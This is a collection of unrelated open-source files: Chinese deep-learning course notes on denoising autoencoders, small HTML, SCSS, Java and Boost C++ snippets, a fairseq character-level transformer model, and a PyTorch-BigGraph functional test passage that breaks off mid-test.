<img src="{{site.baseurl}}/images/week07/07-3/22_out_denoising_ae.png" width="500px" /><br>
<b>图21</b>: 降噪自动编码器的输出 <br>
</center>
### Kernels comparison
一个重要的注意是,即使事实上输入维度是 $28 \times 28 = 784$,但一个维度为 500的隐藏层也还是过度完成层,因为图片中的黑色像素。下方内核的例子用未完成层的标准自动编码器来训练。明显地,一些存在数字的区域中的像素说明了某种图案被检测到,同时地,这些区外的像素就基本上是随机的。这说明了一个标准自动编码器是不会理会数字存在的区域以外的区域。
<center>
<img src="{{site.baseurl}}/images/week07/07-3/AE_kernels.png" style="zoom: 40%; background-color:#DCDCDC;" /><br>
<b>图22:</b> 标准AE内核。
</center>
相反地,当同样的数据被传到降噪自动编码器中时,而在拟合(fitting)模型之前对每一张图都用了Dropout 掩膜(Dropout mask)时,一些不一样的东西就会发生了。每个学习存在数字之外的区域的结构的内核都会学到成一些恒定值,所以这个模型现在就会关心数字区域以外的像素,那是因为对图片实行了Dropout 掩膜(Dropout mask )。
<center>
<img src="{{site.baseurl}}/images/week07/07-3/denoiser_kernels.png" style="zoom: 50%; background-color:#DCDCDC;" /><br>
<b>图23:</b> 降噪AE内核。
</center>
比较一下那一个最强最厉害的话,那我们的自动编码器是做得更好!你可以在下方看到其结果。
<center>
<img src="{{site.baseurl}}/images/week07/07-3/AE_output.png" style="zoom: 40%; background-color:#DCDCDC;" /><br>
<b>图24:</b> 输入数据(MNIST数字版)。
</center>
<center>
<img src="{{site.baseurl}}/images/week07/07-3/denoiser_output.png" style="zoom: 40%; background-color:#DCDCDC;" /><br>
<b>图25:</b> 降噪AE重建。
</center>
<center>
<img src="{{site.baseurl}}/images/week07/07-3/telea_output.png" style="zoom: 40%; background-color:#DCDCDC;" /><br>
<b>图26:</b> Telea修复输出。
</center>
<center>
<img src="{{site.baseurl}}/images/week07/07-3/navier-stokes_output.png" style="zoom: 40%; background-color:#DCDCDC;" /><br>
<b>图27:</b> Navier-Stokes修复输出。
</center>
| {
"pile_set_name": "Github"
} |
---
title: Baseline
---
<div id="baseline" class="mb-large">
<h4><a href="#baseline">#baseline</a></h4>
<div style="height:calc(var(--spacing-base) * 20)" class="baseline bc-dark">
<div class="bc-secondary w-100 h-100"></div>
</div>
</div> | {
"pile_set_name": "Github"
} |
/*
* Copyright 2016, Stuart Douglas, and individual contributors as indicated
* by the @authors tag.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.fakereplace.integration.wildfly.autoupdate;
import java.io.File;
import java.net.URL;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.Collections;
import java.util.List;
import org.junit.Test;
/**
* @author Stuart Douglas
*/
public class ClassLoaderCompilerTestCase {
@Test
public void testCompiler() throws Exception {
try {
URL baseUrl = getClass().getClassLoader().getResource(".");
Path path = Paths.get(baseUrl.toURI());
Path base = path.resolve( ".." + File.separatorChar + ".." + File.separatorChar + "src" + File.separatorChar + "test" + File.separatorChar + "java");
List<String> data = Collections.singletonList(getClass().getName());
ClassLoaderCompiler compiler = new ClassLoaderCompiler(new ClassLoader(getClass().getClassLoader()) {
}, base, data); //the CL will be closed if it is not wrapped
compiler.compile();
} catch (Throwable e) {
e.printStackTrace();
throw new RuntimeException(e);
}
}
}
| {
"pile_set_name": "Github"
} |
// (C) Copyright John Maddock 2007.
// Use, modification and distribution are subject to the
// Boost Software License, Version 1.0. (See accompanying file
// LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt)
//
// This file is machine generated, do not edit by hand
// Unrolled polynomial evaluation using second order Horners rule
#ifndef BOOST_MATH_TOOLS_POLY_EVAL_6_HPP
#define BOOST_MATH_TOOLS_POLY_EVAL_6_HPP
namespace boost{ namespace math{ namespace tools{ namespace detail{
template <class T, class V>
inline V evaluate_polynomial_c_imp(const T*, const V&, const mpl::int_<0>*) BOOST_MATH_NOEXCEPT(V)
{
return static_cast<V>(0);
}
template <class T, class V>
inline V evaluate_polynomial_c_imp(const T* a, const V&, const mpl::int_<1>*) BOOST_MATH_NOEXCEPT(V)
{
return static_cast<V>(a[0]);
}
template <class T, class V>
inline V evaluate_polynomial_c_imp(const T* a, const V& x, const mpl::int_<2>*) BOOST_MATH_NOEXCEPT(V)
{
return static_cast<V>(a[1] * x + a[0]);
}
template <class T, class V>
inline V evaluate_polynomial_c_imp(const T* a, const V& x, const mpl::int_<3>*) BOOST_MATH_NOEXCEPT(V)
{
return static_cast<V>((a[2] * x + a[1]) * x + a[0]);
}
template <class T, class V>
inline V evaluate_polynomial_c_imp(const T* a, const V& x, const mpl::int_<4>*) BOOST_MATH_NOEXCEPT(V)
{
return static_cast<V>(((a[3] * x + a[2]) * x + a[1]) * x + a[0]);
}
template <class T, class V>
inline V evaluate_polynomial_c_imp(const T* a, const V& x, const mpl::int_<5>*) BOOST_MATH_NOEXCEPT(V)
{
V x2 = x * x;
V t[2];
t[0] = static_cast<V>(a[4] * x2 + a[2]);
t[1] = static_cast<V>(a[3] * x2 + a[1]);
t[0] *= x2;
t[0] += static_cast<V>(a[0]);
t[1] *= x;
return t[0] + t[1];
}
template <class T, class V>
inline V evaluate_polynomial_c_imp(const T* a, const V& x, const mpl::int_<6>*) BOOST_MATH_NOEXCEPT(V)
{
V x2 = x * x;
V t[2];
t[0] = a[5] * x2 + a[3];
t[1] = a[4] * x2 + a[2];
t[0] *= x2;
t[1] *= x2;
t[0] += static_cast<V>(a[1]);
t[1] += static_cast<V>(a[0]);
t[0] *= x;
return t[0] + t[1];
}
}}}} // namespaces
#endif // include guard
| {
"pile_set_name": "Github"
} |
$x: true;
@function foobar() {
@if $x {
$x: false;
@return foo;
}
@else {
$x: true;
@return bar;
}
}
div {
content: foobar();
content: foobar();
content: foobar();
content: foobar();
$x: false;
content: foobar();
} | {
"pile_set_name": "Github"
} |
#!/usr/bin/env python3
import logging
import math
from ast import literal_eval
import torch
import torch.nn as nn
import torch.nn.functional as F
from fairseq.models import (
FairseqEncoder,
register_model,
register_model_architecture,
transformer as fairseq_transformer,
)
from fairseq.modules import SinusoidalPositionalEmbedding
from pytorch_translate import char_encoder, transformer, utils, vocab_constants
from pytorch_translate.char_source_model import verify_pretrain_params
from pytorch_translate.common_layers import (
TransformerEncoderGivenEmbeddings,
VariableTracker,
)
from pytorch_translate.data.dictionary import TAGS
logger = logging.getLogger(__name__)
@register_model("char_source_transformer")
class CharSourceTransformerModel(transformer.TransformerModel):
def __init__(self, task, encoder, decoder):
super().__init__(task, encoder, decoder)
@staticmethod
def add_args(parser):
transformer.TransformerModel.add_args(parser)
parser.add_argument(
"--char-embed-dim",
type=int,
default=128,
metavar="N",
help=("Character embedding dimension."),
)
parser.add_argument(
"--char-cnn-params",
type=str,
metavar="EXPR",
help=("String experission, [(dim, kernel_size), ...]."),
)
parser.add_argument(
"--char-cnn-nonlinear-fn",
type=str,
default="tanh",
metavar="EXPR",
help=("Nonlinearity applied to char conv outputs. Values: relu, tanh."),
)
parser.add_argument(
"--char-cnn-num-highway-layers",
type=int,
default=0,
metavar="N",
help=("Char cnn encoder highway layers."),
)
parser.add_argument(
"--char-cnn-output-dim",
type=int,
default=-1,
metavar="N",
help="Output dim of the CNN layer. If set to -1, this is computed "
"from char-cnn-params.",
)
parser.add_argument(
"--use-pretrained-weights",
type=utils.bool_flag,
nargs="?",
const=True,
default=False,
help="Use pretrained weights for the character model including "
"the char embeddings, CNN filters, highway networks",
)
parser.add_argument(
"--finetune-pretrained-weights",
type=utils.bool_flag,
nargs="?",
const=True,
default=False,
help="Boolean flag to specify whether or not to update the "
"pretrained weights as part of training",
)
parser.add_argument(
"--pretrained-weights-file",
type=str,
default="",
help=("Weights file for loading pretrained weights"),
)
@classmethod
def build_model(cls, args, task):
"""Build a new model instance."""
src_dict, dst_dict = task.source_dictionary, task.target_dictionary
base_architecture(args)
assert hasattr(args, "char_source_dict_size"), (
"args.char_source_dict_size required. "
"should be set by load_binarized_dataset()"
)
if args.share_all_embeddings:
if src_dict != dst_dict:
raise RuntimeError(
"--share-all-embeddings requires a joined dictionary"
)
if args.encoder_embed_dim != args.decoder_embed_dim:
raise RuntimeError(
"--share-all-embeddings requires --encoder-embed-dim "
"to match --decoder-embed-dim"
)
if args.decoder_pretrained_embed and (
args.decoder_pretrained_embed != args.encoder_pretrained_embed
):
raise RuntimeError(
"--share-all-embeddings not compatible with "
"--decoder-pretrained-embed"
)
encoder_embed_tokens = transformer.build_embedding(
src_dict,
args.encoder_embed_dim,
args.encoder_pretrained_embed,
args.encoder_freeze_embed,
)
decoder_embed_tokens = encoder_embed_tokens
args.share_decoder_input_output_embed = True
else:
encoder_embed_tokens = transformer.build_embedding(
src_dict,
args.encoder_embed_dim,
args.encoder_pretrained_embed,
args.encoder_freeze_embed,
)
decoder_embed_tokens = transformer.build_embedding(
dst_dict,
args.decoder_embed_dim,
args.decoder_pretrained_embed,
args.decoder_freeze_embed,
)
args.embed_bytes = getattr(args, "embed_bytes", False)
# If we embed bytes then the number of indices is fixed and does not
# depend on the dictionary
if args.embed_bytes:
num_chars = vocab_constants.NUM_BYTE_INDICES + TAGS.__len__() + 1
else:
num_chars = args.char_source_dict_size
# In case use_pretrained_weights is true, verify the model params
# are correctly set
if args.embed_bytes and getattr(args, "use_pretrained_weights", False):
verify_pretrain_params(args)
encoder = CharCNNEncoder(
args,
src_dict,
encoder_embed_tokens,
num_chars=num_chars,
embed_dim=args.char_embed_dim,
char_cnn_params=args.char_cnn_params,
char_cnn_nonlinear_fn=args.char_cnn_nonlinear_fn,
char_cnn_num_highway_layers=args.char_cnn_num_highway_layers,
char_cnn_output_dim=getattr(args, "char_cnn_output_dim", -1),
use_pretrained_weights=getattr(args, "use_pretrained_weights", False),
finetune_pretrained_weights=getattr(
args, "finetune_pretrained_weights", False
),
weights_file=getattr(args, "pretrained_weights_file", ""),
)
decoder = transformer.TransformerDecoder(
args=args,
src_dict=src_dict,
dst_dict=dst_dict,
embed_tokens=decoder_embed_tokens,
)
return cls(task, encoder, decoder)
def forward(
self, src_tokens, src_lengths, char_inds, word_lengths, prev_output_tokens
):
"""
Overriding FairseqEncoderDecoderModel.forward() due to different encoder
inputs.
"""
encoder_out = self.encoder(src_tokens, src_lengths, char_inds, word_lengths)
decoder_out = self.decoder(prev_output_tokens, encoder_out)
return decoder_out
class CharCNNEncoder(FairseqEncoder):
"""
Character-level CNN encoder to generate word representations, as input to
transformer encoder.
"""
def __init__(
self,
args,
dictionary,
embed_tokens,
num_chars=50,
embed_dim=32,
char_cnn_params="[(128, 3), (128, 5)]",
char_cnn_nonlinear_fn="tanh",
char_cnn_num_highway_layers=0,
char_cnn_output_dim=-1,
use_pretrained_weights=False,
finetune_pretrained_weights=False,
weights_file=None,
):
super().__init__(dictionary)
convolutions_params = literal_eval(char_cnn_params)
self.char_cnn_encoder = char_encoder.CharCNNModel(
dictionary,
num_chars,
embed_dim,
convolutions_params,
char_cnn_nonlinear_fn,
char_cnn_num_highway_layers,
char_cnn_output_dim,
use_pretrained_weights,
finetune_pretrained_weights,
weights_file,
)
self.embed_tokens = embed_tokens
token_embed_dim = embed_tokens.embedding_dim
self.word_layer_norm = nn.LayerNorm(token_embed_dim)
char_embed_dim = (
char_cnn_output_dim
if char_cnn_output_dim != -1
else sum(out_dim for (out_dim, _) in convolutions_params)
)
self.char_layer_norm = nn.LayerNorm(char_embed_dim)
self.word_dim = char_embed_dim + token_embed_dim
self.char_scale = math.sqrt(char_embed_dim / self.word_dim)
self.word_scale = math.sqrt(token_embed_dim / self.word_dim)
if self.word_dim != args.encoder_embed_dim:
self.word_to_transformer_embed = fairseq_transformer.Linear(
self.word_dim, args.encoder_embed_dim
)
self.dropout = args.dropout
self.padding_idx = dictionary.pad()
self.embed_positions = fairseq_transformer.PositionalEmbedding(
1024,
args.encoder_embed_dim,
self.padding_idx,
learned=args.encoder_learned_pos,
)
self.transformer_encoder_given_embeddings = TransformerEncoderGivenEmbeddings(
args=args, proj_to_decoder=True
)
# Variable tracker
self.tracker = VariableTracker()
# Initialize adversarial mode
self.set_gradient_tracking_mode(False)
self.set_embed_noising_mode(False)
# disables sorting and word-length thresholding if True
# (enables ONNX tracing of length-sorted input with batch_size = 1)
self.onnx_export_model = False
def prepare_for_onnx_export_(self):
self.onnx_export_model = True
def set_gradient_tracking_mode(self, mode=True):
""" This allows AdversarialTrainer to turn on retrain_grad when
running adversarial example generation model."""
self.tracker.reset()
self.track_gradients = mode
def set_embed_noising_mode(self, mode=True):
"""This allows adversarial trainer to turn on and off embedding noising
layers. In regular training, this mode is off, and it is not included
in forward pass.
"""
self.embed_noising_mode = mode
def forward(self, src_tokens, src_lengths, char_inds, word_lengths):
self.tracker.reset()
# char_inds has shape (batch_size, max_words_per_sent, max_word_len)
bsz, seqlen, maxchars = char_inds.size()
# char_cnn_encoder takes input (max_word_length, total_words)
char_inds_flat = char_inds.view(-1, maxchars).t()
# output (total_words, encoder_dim)
char_cnn_output = self.char_cnn_encoder(char_inds_flat)
x = char_cnn_output.view(bsz, seqlen, char_cnn_output.shape[-1])
x = x.transpose(0, 1) # (seqlen, bsz, char_cnn_output_dim)
x = self.char_layer_norm(x)
x = self.char_scale * x
embedded_tokens = self.embed_tokens(src_tokens)
# (seqlen, bsz, token_embed_dim)
embedded_tokens = embedded_tokens.transpose(0, 1)
embedded_tokens = self.word_layer_norm(embedded_tokens)
embedded_tokens = self.word_scale * embedded_tokens
x = torch.cat([x, embedded_tokens], dim=2)
self.tracker.track(x, "token_embeddings", retain_grad=self.track_gradients)
# T x B x C -> B x T x C
x = x.transpose(0, 1)
if self.word_to_transformer_embed is not None:
x = self.word_to_transformer_embed(x)
positions = self.embed_positions(src_tokens)
x += positions
x = F.dropout(x, p=self.dropout, training=self.training)
# B x T x C -> T x B x C
x = x.transpose(0, 1)
# compute padding mask (B x T)
encoder_padding_mask = src_tokens.eq(self.padding_idx)
if not encoder_padding_mask.any():
encoder_padding_mask = None
x = self.transformer_encoder_given_embeddings(
x=x, positions=positions, encoder_padding_mask=encoder_padding_mask
)
if self.onnx_export_model and encoder_padding_mask is None:
encoder_padding_mask = torch.Tensor([]).type_as(src_tokens)
return x, src_tokens, encoder_padding_mask
def reorder_encoder_out(self, encoder_out, new_order):
(x, src_tokens, encoder_padding_mask) = encoder_out
if x is not None:
x = x.index_select(1, new_order)
if src_tokens is not None:
src_tokens = src_tokens.index_select(0, new_order)
if encoder_padding_mask is not None:
encoder_padding_mask = encoder_padding_mask.index_select(0, new_order)
return (x, src_tokens, encoder_padding_mask)
def max_positions(self):
"""Maximum input length supported by the encoder."""
return self.embed_positions.max_positions
def upgrade_state_dict(self, state_dict):
if isinstance(self.embed_positions, SinusoidalPositionalEmbedding):
if "encoder.embed_positions.weights" in state_dict:
del state_dict["encoder.embed_positions.weights"]
state_dict["encoder.embed_positions._float_tensor"] = torch.FloatTensor(1)
return state_dict
@register_model_architecture("char_source_transformer", "char_source_transformer")
def base_architecture(args):
# default architecture
transformer.base_architecture(args)
args.char_cnn_params = getattr(args, "char_cnn_params", "[(50, 1), (100,2)]")
args.char_cnn_nonlinear_fn = getattr(args, "chr_cnn_nonlinear_fn", "relu")
args.char_cnn_num_highway_layers = getattr(args, "char_cnn_num_highway_layers", "2")
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>FILEHEADER</key>
<string>
/*
Copyright (c) ___YEAR___, Apple Inc. All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation and/or
other materials provided with the distribution.
3. Neither the name of the copyright holder(s) nor the names of any contributors
may be used to endorse or promote products derived from this software without
specific prior written permission. No license is granted to the trademarks of
the copyright holders even if such marks are included in this software.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/</string>
</dict>
</plist>
| {
"pile_set_name": "Github"
} |
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE.txt file in the root directory of this source tree.
import json
import logging
import os.path
import random
import time
import unittest
from functools import partial
from tempfile import TemporaryDirectory
from typing import Dict, Iterable, List, Mapping, NamedTuple, Tuple, Union
from unittest import TestCase, main
import attr
import h5py
import numpy as np
import torch
import torch.multiprocessing as mp
from torchbiggraph.config import ConfigSchema, EntitySchema, RelationSchema
from torchbiggraph.eval import do_eval
from torchbiggraph.partitionserver import run_partition_server
from torchbiggraph.stats import SerializedStats
from torchbiggraph.train import train
from torchbiggraph.train_gpu import CPP_INSTALLED
from torchbiggraph.util import (
SubprocessInitializer,
call_one_after_the_other,
setup_logging,
)
logger = logging.getLogger("torchbiggraph")
class Dataset(NamedTuple):
entity_path: TemporaryDirectory
relation_paths: List[TemporaryDirectory]
def cleanup(self):
self.entity_path.cleanup()
for path in self.relation_paths:
path.cleanup()
def broadcast_nums(nums: Iterable[int]) -> int:
different_nums = set(nums) - {1}
if len(different_nums) > 1:
raise RuntimeError("%s cannot be broadcast to a single value" % nums)
return different_nums.pop() if different_nums else 1
def generate_dataset(
config: ConfigSchema, num_entities: int, fractions: List[float]
) -> Dataset:
"""Create a randomly-generated dataset compatible with the given config.
Create embeddings for each entity (generating the same given number of
entities for each type) and produce an edge between them if their dot
product is positive. The edges are split up into several sets, each one
containing a fraction of the total, as given in the argument (the fractions
can sum to less than 1, in which case the leftover edges are discarded).
"""
entity_path = TemporaryDirectory()
relation_paths = [TemporaryDirectory() for _ in fractions]
embeddings: Dict[str, Tuple[np.ndarray]] = {}
for entity_name, entity in config.entities.items():
embeddings[entity_name] = np.split(
np.random.randn(num_entities, config.dimension),
np.cumsum(
np.random.multinomial(
num_entities, [1 / entity.num_partitions] * entity.num_partitions
)[:-1]
),
)
for partition, embedding in enumerate(embeddings[entity_name]):
with open(
os.path.join(
entity_path.name,
"entity_count_%s_%d.txt" % (entity_name, partition),
),
"xt",
) as tf:
tf.write("%d" % len(embedding))
any_lhs_featurized = any(
config.entities[relation.lhs].featurized for relation in config.relations
)
any_rhs_featurized = any(
config.entities[relation.rhs].featurized for relation in config.relations
)
num_lhs_partitions = broadcast_nums(
len(embeddings[relation.lhs]) for relation in config.relations
)
num_rhs_partitions = broadcast_nums(
len(embeddings[relation.rhs]) for relation in config.relations
)
for lhs_partition in range(num_lhs_partitions):
for rhs_partition in range(num_rhs_partitions):
dtype = [
("lhs", np.int64),
("lhs_feat", np.bool_),
("rhs", np.int64),
("rhs_feat", np.bool_),
("rel", np.int64),
]
edges = np.empty((0,), dtype=dtype)
for rel_idx, relation in enumerate(config.relations):
lhs_partitioned = config.entities[relation.lhs].num_partitions > 1
rhs_partitioned = config.entities[relation.rhs].num_partitions > 1
lhs_embs = embeddings[relation.lhs][
lhs_partition if lhs_partitioned else 0
]
rhs_embs = embeddings[relation.rhs][
rhs_partition if rhs_partitioned else 0
]
scores = np.einsum("ld,rd->lr", lhs_embs, rhs_embs)
num_these_edges = np.count_nonzero(scores > 0)
these_edges = np.empty(num_these_edges, dtype=dtype)
these_edges["lhs"], these_edges["rhs"] = np.nonzero(scores > 0)
these_edges["rel"] = rel_idx
these_edges["lhs_feat"] = config.entities[relation.lhs].featurized
these_edges["rhs_feat"] = config.entities[relation.rhs].featurized
edges = np.append(edges, these_edges)
edges = edges[np.random.permutation(len(edges))]
start_idx = 0
for fraction, path in zip(fractions, relation_paths):
end_idx = start_idx + int(fraction * len(edges))
with h5py.File(
os.path.join(
path.name, "edges_%d_%d.h5" % (lhs_partition, rhs_partition)
),
"x",
) as hf:
hf.attrs["format_version"] = 1
these_edges = edges[start_idx:end_idx]
if any_lhs_featurized:
hf["lhsd_data"] = these_edges["lhs"][these_edges["lhs_feat"]]
hf["lhsd_offsets"] = np.concatenate(
(
np.array([0], dtype=np.int64),
np.cumsum(these_edges["lhs_feat"], dtype=np.int64),
)
)
# Poison the non-featurized data.
these_edges["lhs"][these_edges["lhs_feat"]] = -1
if any_rhs_featurized:
hf["rhsd_data"] = these_edges["rhs"][these_edges["rhs_feat"]]
hf["rhsd_offsets"] = np.concatenate(
(
np.array([0], dtype=np.int64),
np.cumsum(these_edges["rhs_feat"], dtype=np.int64),
)
)
# Poison the non-featurized data.
these_edges["rhs"][these_edges["rhs_feat"]] = -1
hf["lhs"] = these_edges["lhs"]
hf["rhs"] = these_edges["rhs"]
hf["rel"] = these_edges["rel"]
start_idx = end_idx
return Dataset(entity_path, relation_paths)
def init_embeddings(target: str, config: ConfigSchema, *, version: int = 0):
with open(os.path.join(target, "checkpoint_version.txt"), "xt") as tf:
tf.write("%d" % version)
for entity_name, entity in config.entities.items():
for partition in range(entity.num_partitions):
with open(
os.path.join(
config.entity_path,
"entity_count_%s_%d.txt" % (entity_name, partition),
),
"rt",
) as tf:
entity_count = int(tf.read().strip())
with h5py.File(
os.path.join(
target,
"embeddings_%s_%d.v%d.h5" % (entity_name, partition, version),
),
"x",
) as hf:
hf.attrs["format_version"] = 1
hf.create_dataset(
"embeddings",
data=np.random.randn(
entity_count, config.entity_dimension(entity_name)
),
)
with h5py.File(os.path.join(target, "model.v%d.h5" % version), "x") as hf:
hf.attrs["format_version"] = 1
class TestFunctional(TestCase):
def setUp(self) -> None:
self.subprocess_init = SubprocessInitializer()
self.subprocess_init.register(setup_logging, 1)
self.subprocess_init()
self.checkpoint_path = TemporaryDirectory()
self.addCleanup(self.checkpoint_path.cleanup)
seed = random.getrandbits(32)
np.random.seed(seed)
logger.info(f"Random seed: {seed}")
def assertHasMetadata(self, hf: h5py.File, config: ConfigSchema) -> None:
self.assertEqual(hf.attrs["format_version"], 1)
self.assertEqual(json.loads(hf.attrs["config/json"]), config.to_dict())
self.assertCountEqual(
[
key.partition("/")[-1]
for key in hf.attrs.keys()
if key.startswith("iteration/")
],
[
"num_epochs",
"epoch_idx",
"num_edge_paths",
"edge_path_idx",
"edge_path",
"num_edge_chunks",
"edge_chunk_idx",
],
)
def assertIsModelParameter(self, dataset: h5py.Dataset) -> None:
# In fact it could also be a group...
if not isinstance(dataset, h5py.Dataset):
return
self.assertIn("state_dict_key", dataset.attrs)
self.assertTrue(np.isfinite(dataset[...]).all())
def assertIsModelParameters(self, group: h5py.Group) -> None:
self.assertIsInstance(group, h5py.Group)
group.visititems(lambda _, d: self.assertIsModelParameter(d))
def assertIsOptimStateDict(self, dataset: h5py.Dataset) -> None:
self.assertIsInstance(dataset, h5py.Dataset)
self.assertEqual(dataset.dtype, np.dtype("V1"))
self.assertEqual(len(dataset.shape), 1)
def assertIsEmbeddings(
self, dataset: h5py.Dataset, entity_count: int, dimension: int
) -> None:
self.assertIsInstance(dataset, h5py.Dataset)
self.assertEqual(dataset.dtype, np.float32)
self.assertEqual(dataset.shape, (entity_count, dimension))
self.assertTrue(np.all(np.isfinite(dataset[...])))
self.assertTrue(np.all(np.linalg.norm(dataset[...], axis=-1) != 0))
def assertIsStatsDict(
self, stats: Mapping[str, Union[int, SerializedStats]]
) -> None:
self.assertIsInstance(stats, dict)
self.assertIn("index", stats)
for k, v in stats.items():
if k in (
"epoch_idx",
"edge_path_idx",
"edge_chunk_idx",
"lhs_partition",
"rhs_partition",
"index",
):
self.assertIsInstance(v, int)
elif k in (
"stats",
"eval_stats_before",
"eval_stats_after",
"eval_stats_chunk_avg",
):
self.assertIsInstance(v, dict)
assert isinstance(v, dict)
self.assertCountEqual(v.keys(), ["count", "metrics"])
self.assertIsInstance(v["count"], int)
metrics = v["metrics"]
self.assertIsInstance(metrics, dict)
assert isinstance(metrics, dict)
for m in metrics.values():
self.assertIsInstance(m, float)
else:
self.fail(f"Unknown stats key: {k}")
def assertCheckpointWritten(self, config: ConfigSchema, *, version: int) -> None:
with open(
os.path.join(config.checkpoint_path, "checkpoint_version.txt"), "rt"
) as tf:
self.assertEqual(version, int(tf.read().strip()))
with open(os.path.join(config.checkpoint_path, "config.json"), "rt") as tf:
self.assertEqual(json.load(tf), config.to_dict())
with h5py.File(
os.path.join(config.checkpoint_path, "model.v%d.h5" % version), "r"
) as hf:
self.assertHasMetadata(hf, config)
self.assertIsModelParameters(hf["model"])
self.assertIsOptimStateDict(hf["optimizer/state_dict"])
with open(
os.path.join(config.checkpoint_path, "training_stats.json"), "rt"
) as tf:
for line in tf:
self.assertIsStatsDict(json.loads(line))
for entity_name, entity in config.entities.items():
for partition in range(entity.num_partitions):
with open(
os.path.join(
config.entity_path,
"entity_count_%s_%d.txt" % (entity_name, partition),
),
"rt",
) as tf:
entity_count = int(tf.read().strip())
with h5py.File(
os.path.join(
config.checkpoint_path,
"embeddings_%s_%d.v%d.h5" % (entity_name, partition, version),
),
"r",
) as hf:
self.assertHasMetadata(hf, config)
self.assertIsEmbeddings(
hf["embeddings"],
entity_count,
config.entity_dimension(entity_name),
)
self.assertIsOptimStateDict(hf["optimizer/state_dict"])
def test_default(self):
entity_name = "e"
relation_config = RelationSchema(name="r", lhs=entity_name, rhs=entity_name)
base_config = ConfigSchema(
dimension=10,
relations=[relation_config],
entities={entity_name: EntitySchema(num_partitions=1)},
regularization_coef=1e-4,
entity_path=None, # filled in later
edge_paths=[], # filled in later
checkpoint_path=self.checkpoint_path.name,
workers=2,
)
dataset = generate_dataset(base_config, num_entities=100, fractions=[0.4, 0.2])
self.addCleanup(dataset.cleanup)
train_config = attr.evolve(
base_config,
entity_path=dataset.entity_path.name,
edge_paths=[dataset.relation_paths[0].name],
)
eval_config = attr.evolve(
base_config,
entity_path=dataset.entity_path.name,
edge_paths=[dataset.relation_paths[1].name],
relations=[attr.evolve(relation_config, all_negs=True)],
)
# Just make sure no exceptions are raised and nothing crashes.
train(train_config, rank=0, subprocess_init=self.subprocess_init)
self.assertCheckpointWritten(train_config, version=1)
do_eval(eval_config, subprocess_init=self.subprocess_init)
def test_resume_from_checkpoint(self):
entity_name = "e"
relation_config = RelationSchema(name="r", lhs=entity_name, rhs=entity_name)
base_config = ConfigSchema(
dimension=10,
relations=[relation_config],
entities={entity_name: EntitySchema(num_partitions=1)},
entity_path=None, # filled in later
edge_paths=[], # filled in later
checkpoint_path=self.checkpoint_path.name,
num_epochs=2,
num_edge_chunks=2,
workers=2,
)
dataset = generate_dataset(base_config, num_entities=100, fractions=[0.4, 0.4])
self.addCleanup(dataset.cleanup)
train_config = attr.evolve(
base_config,
entity_path=dataset.entity_path.name,
edge_paths=[d.name for d in dataset.relation_paths],
)
# Just make sure no exceptions are raised and nothing crashes.
init_embeddings(train_config.checkpoint_path, train_config, version=7)
train(train_config, rank=0, subprocess_init=self.subprocess_init)
self.assertCheckpointWritten(train_config, version=8)
# Check we did resume the run, not start the whole thing anew.
self.assertFalse(
os.path.exists(os.path.join(train_config.checkpoint_path, "model.v6.h5"))
)
def test_with_initial_value(self):
entity_name = "e"
relation_config = RelationSchema(name="r", lhs=entity_name, rhs=entity_name)
base_config = ConfigSchema(
dimension=10,
relations=[relation_config],
entities={entity_name: EntitySchema(num_partitions=1)},
entity_path=None, # filled in later
edge_paths=[], # filled in later
checkpoint_path=self.checkpoint_path.name,
workers=2,
)
dataset = generate_dataset(base_config, num_entities=100, fractions=[0.4])
self.addCleanup(dataset.cleanup)
init_dir = TemporaryDirectory()
self.addCleanup(init_dir.cleanup)
train_config = attr.evolve(
base_config,
entity_path=dataset.entity_path.name,
edge_paths=[dataset.relation_paths[0].name],
init_path=init_dir.name,
)
# Just make sure no exceptions are raised and nothing crashes.
init_embeddings(train_config.init_path, train_config)
train(train_config, rank=0, subprocess_init=self.subprocess_init)
self.assertCheckpointWritten(train_config, version=1)
def test_featurized(self):
e1 = EntitySchema(num_partitions=1, featurized=True)
e2 = EntitySchema(num_partitions=1)
r1 = RelationSchema(name="r1", lhs="e1", rhs="e2")
r2 = RelationSchema(name="r2", lhs="e2", rhs="e1")
base_config = ConfigSchema(
dimension=10,
relations=[r1, r2],
entities={"e1": e1, "e2": e2},
entity_path=None, # filled in later
edge_paths=[], # filled in later
checkpoint_path=self.checkpoint_path.name,
workers=2,
regularization_coef=1e-4,
)
dataset = generate_dataset(base_config, num_entities=100, fractions=[0.4, 0.2])
self.addCleanup(dataset.cleanup)
